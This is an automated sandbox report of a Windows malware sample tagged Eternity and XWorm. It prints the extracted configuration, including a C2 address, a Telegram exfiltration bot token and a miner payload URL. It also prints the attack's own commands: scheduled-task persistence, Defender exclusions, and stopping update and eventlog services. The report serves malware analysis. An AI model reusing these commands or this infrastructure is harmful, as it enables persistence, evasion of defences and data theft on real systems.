eternity | a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d

Analysis

max time kernel
78s
max time network
100s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 06:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Size

455KB
MD5

c8d9593196962fa5d706a207c16674cd
SHA1

686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
SHA512

5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
SSDEEP

12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK

Score

10^/10

eternity xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.1

104.194.9.116:7000

Mutex

bUezpCDHVjUVS3W9

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845

aes.plain

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1016-6-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	ngen.exe

Executes dropped EXE 6 IoCs

pid	Process
3116	kxggpl.exe
3860	peeguu.exe
4932	regsvcs.exe
4836	zgigxl.exe
2472	regsvcs.exe
4544	pkiwizgebqxq.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	iexplore.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3476 set thread context of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3116 set thread context of 1208	3116	kxggpl.exe	106
PID 3860 set thread context of 2524	3860	peeguu.exe	118
PID 4836 set thread context of 4920	4836	zgigxl.exe	121
PID 2524 set thread context of 2960	2524	iexplore.exe	149

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3352	sc.exe
1008	sc.exe
4400	sc.exe
452	sc.exe
392	sc.exe
1004	sc.exe
1424	sc.exe
2584	sc.exe
3260	sc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4560	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\OperationalData = "8"	pkiwizgebqxq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main	pkiwizgebqxq.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
996	PING.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
2524	iexplore.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2960	dialer.exe
2960	dialer.exe
2524	iexplore.exe
2524	iexplore.exe
2524	iexplore.exe
2960	dialer.exe
2960	dialer.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
Token: SeDebugPrivilege	1016	jsc.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeShutdownPrivilege	4292	powercfg.exe
Token: SeCreatePagefilePrivilege	4292	powercfg.exe
Token: SeShutdownPrivilege	4804	powercfg.exe
Token: SeCreatePagefilePrivilege	4804	powercfg.exe
Token: SeShutdownPrivilege	208	powercfg.exe
Token: SeCreatePagefilePrivilege	208	powercfg.exe
Token: SeShutdownPrivilege	872	powercfg.exe
Token: SeCreatePagefilePrivilege	872	powercfg.exe
Token: SeDebugPrivilege	2960	dialer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1016	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	89
PID 3476 wrote to memory of 1212	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	90
PID 3476 wrote to memory of 1212	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	90
PID 3476 wrote to memory of 1212	3476	a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe	90
PID 1016 wrote to memory of 3116	1016	jsc.exe	101
PID 1016 wrote to memory of 3116	1016	jsc.exe	101
PID 3116 wrote to memory of 2800	3116	kxggpl.exe	103
PID 3116 wrote to memory of 2800	3116	kxggpl.exe	103
PID 3116 wrote to memory of 2800	3116	kxggpl.exe	103
PID 3116 wrote to memory of 1860	3116	kxggpl.exe	104
PID 3116 wrote to memory of 1860	3116	kxggpl.exe	104
PID 3116 wrote to memory of 1860	3116	kxggpl.exe	104
PID 3116 wrote to memory of 3924	3116	kxggpl.exe	105
PID 3116 wrote to memory of 3924	3116	kxggpl.exe	105
PID 3116 wrote to memory of 3924	3116	kxggpl.exe	105
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 3116 wrote to memory of 1208	3116	kxggpl.exe	106
PID 1208 wrote to memory of 2676	1208	regsvcs.exe	109
PID 1208 wrote to memory of 2676	1208	regsvcs.exe	109
PID 1208 wrote to memory of 2676	1208	regsvcs.exe	109
PID 2676 wrote to memory of 464	2676	cmd.exe	111
PID 2676 wrote to memory of 464	2676	cmd.exe	111
PID 2676 wrote to memory of 464	2676	cmd.exe	111
PID 2676 wrote to memory of 996	2676	cmd.exe	112
PID 2676 wrote to memory of 996	2676	cmd.exe	112
PID 2676 wrote to memory of 996	2676	cmd.exe	112
PID 1016 wrote to memory of 3860	1016	jsc.exe	113
PID 1016 wrote to memory of 3860	1016	jsc.exe	113
PID 2676 wrote to memory of 4560	2676	cmd.exe	114
PID 2676 wrote to memory of 4560	2676	cmd.exe	114
PID 2676 wrote to memory of 4560	2676	cmd.exe	114
PID 2676 wrote to memory of 4932	2676	cmd.exe	115
PID 2676 wrote to memory of 4932	2676	cmd.exe	115
PID 2676 wrote to memory of 4932	2676	cmd.exe	115
PID 1016 wrote to memory of 4836	1016	jsc.exe	117
PID 1016 wrote to memory of 4836	1016	jsc.exe	117
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 3860 wrote to memory of 2524	3860	peeguu.exe	118
PID 4836 wrote to memory of 4920	4836	zgigxl.exe	121
PID 4836 wrote to memory of 4920	4836	zgigxl.exe	121
PID 4836 wrote to memory of 4920	4836	zgigxl.exe	121

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1136
- C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
  2⤵
  - Executes dropped EXE
  PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1380
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:392
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:4804
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1972

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe
"C:\Users\Admin\AppData\Local\Temp\a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3476
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Users\Admin\AppData\Local\Temp\kxggpl.exe
    "C:\Users\Admin\AppData\Local\Temp\kxggpl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3116
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      PID:2800
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
      4⤵
      PID:1860
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:3924
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "regsvcs" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2676
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:464
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:996
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "regsvcs" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:4560
      - C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe
        
        "C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe"
        6⤵
        Executes dropped EXE
        
        PID:4932
- - C:\Users\Admin\AppData\Local\Temp\peeguu.exe
    "C:\Users\Admin\AppData\Local\Temp\peeguu.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe"
      4⤵
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:2524
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1104
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5060
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4400
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:452
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:392
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:3352
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1008
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4292
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:208
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "AHIMMUFK"
        5⤵
        Launches sc.exe
        
        PID:1004
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:1424
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:2584
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "AHIMMUFK"
        5⤵
        Launches sc.exe
        
        PID:3260
- - C:\Users\Admin\AppData\Local\Temp\zgigxl.exe
    "C:\Users\Admin\AppData\Local\Temp\zgigxl.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
      4⤵
      Drops startup file
      PID:4920
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
      4⤵
      PID:2896
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  PID:1212

C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe

Filesize
822KB

MD5
aa094de5b8ef17848a5926c13eb67e26

SHA1
72df0e64ad124ef9bdfa0ed66b3afe62d4364192

SHA256
9c530f1306aa1312fda938169e208a033341bc49ff956695c7616ad6c5d4bc94

SHA512
c2fa9b5141efbba11345e3e4565ddf63b3c9446bb711267a69abeb52117b0eb35ce6c563d97cf0ced03c3c3c9ea8dbd94c2a31d579d4888f03654a75bd5e3b7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvcs.exe.log

Filesize
321B

MD5
baf5d1398fdb79e947b60fe51e45397f

SHA1
49e7b8389f47b93509d621b8030b75e96bb577af

SHA256
10c8c7b5fa58f8c6b69f44e92a4e2af111b59fcf4f21a07e04b19e14876ccdf8

SHA512
b2c9ef5581d5eae7c17ae260fe9f52344ed737fa851cb44d1cea58a32359d0ac5d0ca3099c970209bd30a0d4af6e504101f21b7054cf5eca91c0831cf12fb413

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\regsvcs.exe

Filesize
44KB

MD5
9d352bc46709f0cb5ec974633a0c3c94

SHA1
1969771b2f022f9a86d77ac4d4d239becdf08d07

SHA256
2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

SHA512
13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgbsrkqm.bof.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kxggpl.exe

Filesize
86KB

MD5
486e31124a9d582ceba9b0c511d38d11

SHA1
06e64789514aec2214d42bf35e83055d6225ac35

SHA256
ffd64c83ca0d115da324cbab289ecadb19730caa25203b5f0ff5c0fcc0efcc0b

SHA512
fca12847a2009bad2010a03bc76e21975f7c059ab42bf09db46e73572800cac55cfbb0a74cadc676eb4d6892d66978cfceced1de0ef7357e398723bb07ce5199

Download Submit
C:\Users\Admin\AppData\Local\Temp\kxggpl.exe

Filesize
68KB

MD5
c35dbdd9f90dd3f2beac22f68ef270d7

SHA1
f222a86bf8902f388ff5769c728c9a328c25d5ae

SHA256
16209557eb7e5c5c56f99ce18050b3176a7955a65438d8a56b741b954cfadcb5

SHA512
490f4b6de9861879650414e357d751f545514fb988849f94e985467dafd6c64ce925d9044b9bde996d3024a24cb93fee8eb96b3d78f4cc3bbf13a6e32846988e

Download Submit
C:\Users\Admin\AppData\Local\Temp\kxggpl.exe

Filesize
40KB

MD5
ec85d827b9fdb9556cc92986311ffc24

SHA1
23173a0dad09c8de6f3c70cc94b9b2c03c84424e

SHA256
6297d7e910451a39d4516c080a195b4b0763c3b2536ce69e66f9d918edbd7594

SHA512
a3cdf3ba9fa87e58c72341f19dc5eda49d1c8d3f6e97d3f3aaad704549af0b2221fa25b688b7d020b7686ae30cde5ea5c5389bf10afd89a3c6f23a0743cdd638

Download Submit
C:\Users\Admin\AppData\Local\Temp\peeguu.exe

Filesize
3.1MB

MD5
86e00d529b3b454a84b942ac916211e3

SHA1
021c733e5448436b384bf0d3a0ba81f4d0d93f9a

SHA256
30e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53

SHA512
9a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\zgigxl.exe

Filesize
756KB

MD5
d76027fe4cfd48c7f8999c796e50e731

SHA1
5026422e84bf445e2d141529e2b808187a30d9f6

SHA256
148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799

SHA512
2e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d

Download Submit
memory/64-527-0x0000027502A30000-0x0000027502A5B000-memory.dmp

Filesize
172KB

Download
memory/64-531-0x00007FFAF4B30000-0x00007FFAF4B40000-memory.dmp

Filesize
64KB

Download
memory/612-515-0x0000013A65F40000-0x0000013A65F64000-memory.dmp

Filesize
144KB

Download
memory/668-519-0x000001E34AEA0000-0x000001E34AECB000-memory.dmp

Filesize
172KB

Download
memory/668-522-0x00007FFAF4B30000-0x00007FFAF4B40000-memory.dmp

Filesize
64KB

Download
memory/676-537-0x00000294F7B80000-0x00000294F7BAB000-memory.dmp

Filesize
172KB

Download
memory/676-539-0x00007FFAF4B30000-0x00007FFAF4B40000-memory.dmp

Filesize
64KB

Download
memory/736-541-0x000001ECA42E0000-0x000001ECA430B000-memory.dmp

Filesize
172KB

Download
memory/736-544-0x00007FFAF4B30000-0x00007FFAF4B40000-memory.dmp

Filesize
64KB

Download
